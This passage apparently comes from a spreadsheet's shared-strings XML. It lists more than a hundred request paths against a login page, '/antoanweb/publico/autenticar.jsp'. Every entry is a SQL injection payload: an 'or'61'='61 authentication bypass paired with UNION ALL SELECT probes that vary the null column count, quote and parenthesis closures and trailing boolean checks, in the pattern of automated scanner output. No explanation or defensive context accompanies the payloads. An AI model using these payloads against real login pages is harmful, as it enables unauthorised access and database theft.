    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849,5849#and"zbyr"like"zbyr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777,3777#and"rzpn"like"rzpn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311#and"bqnu"like"bqnu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull--and(3557=3557</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null--and(140=140</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null--and(3810=3810</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null--and(1942=1942</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null--and(849=849</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null--and(5246=5246</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null--and(1688=1688</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null--and(4651=4651</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null--and(5334=5334</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null--and(5887=5887</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull--and((3810=3810</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null--and((3260=3260</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null--and((398=398</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null--and((4185=4185</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null--and((5154=5154</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null--and((3247=3247</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null--and((8924=8924</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null--and((1152=1152</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null--and((6695=6695</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null--and((2640=2640</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull--and(((1067=1067</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null--and(((2598=2598</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null--and(((1351=1351</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null--and(((4383=4383</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null--and(((9890=9890</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null--and(((2946=2946</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null--and(((8793=8793</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null--and(((4714=4714</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null--and(((1990=1990</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null--and(((5251=5251</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselectnull,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull--and('ufkr'='ufkr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null--and('vkko'='vkko</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null--and('zntm'='zntm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null--and('zszf'='zszf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null--and('vimm'='vimm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null--and('woqw'='woqw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null--and('tmxu'='tmxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null--and('agya'='agya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null--and('mimp'='mimp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null--and('ldmg'='ldmg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull--and(('qghe'='qghe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null--and(('pyom'='pyom</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null--and(('xkvd'='xkvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null--and(('ejyp'='ejyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null--and(('namw'='namw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null--and(('jjri'='jjri</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null--and(('mwux'='mwux</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null--and(('uwrp'='uwrp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null--and(('nasi'='nasi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null--and(('znnb'='znnb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull--and((('bqhu'='bqhu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null--and((('icyn'='icyn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null--and((('vjjn'='vjjn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null--and((('iuji'='iuji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null--and((('gmpb'='gmpb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null--and((('fcvc'='fcvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null--and((('zogw'='zogw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null--and((('elbv'='elbv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null--and((('fsjp'='fsjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null--and((('tdtw'='tdtw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull--and'ypbp'='ypbp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null--and'zpsa'='zpsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null--and'xcjc'='xcjc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null--and'ollr'='ollr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null--and'gucq'='gucq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null--and'lruq'='lruq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null--and'awfr'='awfr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null--and'pquq'='pquq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null--and'plwn'='plwn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null--and'rrbx'='rrbx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull--and('gtrj'like'gtrj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null--and('ianl'like'ianl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null--and('rffb'like'rffb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null--and('qxvx'like'qxvx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null--and('nxsd'like'nxsd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null--and('dydn'like'dydn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null--and('afii'like'afii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null--and('itdn'like'itdn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null--and('rwxi'like'rwxi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null--and('cvqs'like'cvqs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull--and(('chxu'like'chxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null--and(('okcf'like'okcf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null--and(('bsol'like'bsol</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null--and(('dlgg'like'dlgg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null--and(('jbxw'like'jbxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null--and(('vojy'like'vojy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null--and(('cjxl'like'cjxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null--and(('jxcd'like'jxcd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null--and(('wqpn'like'wqpn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null--and(('oyyi'like'oyyi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull--and((('rhau'like'rhau</t>
  </si>
  <si>
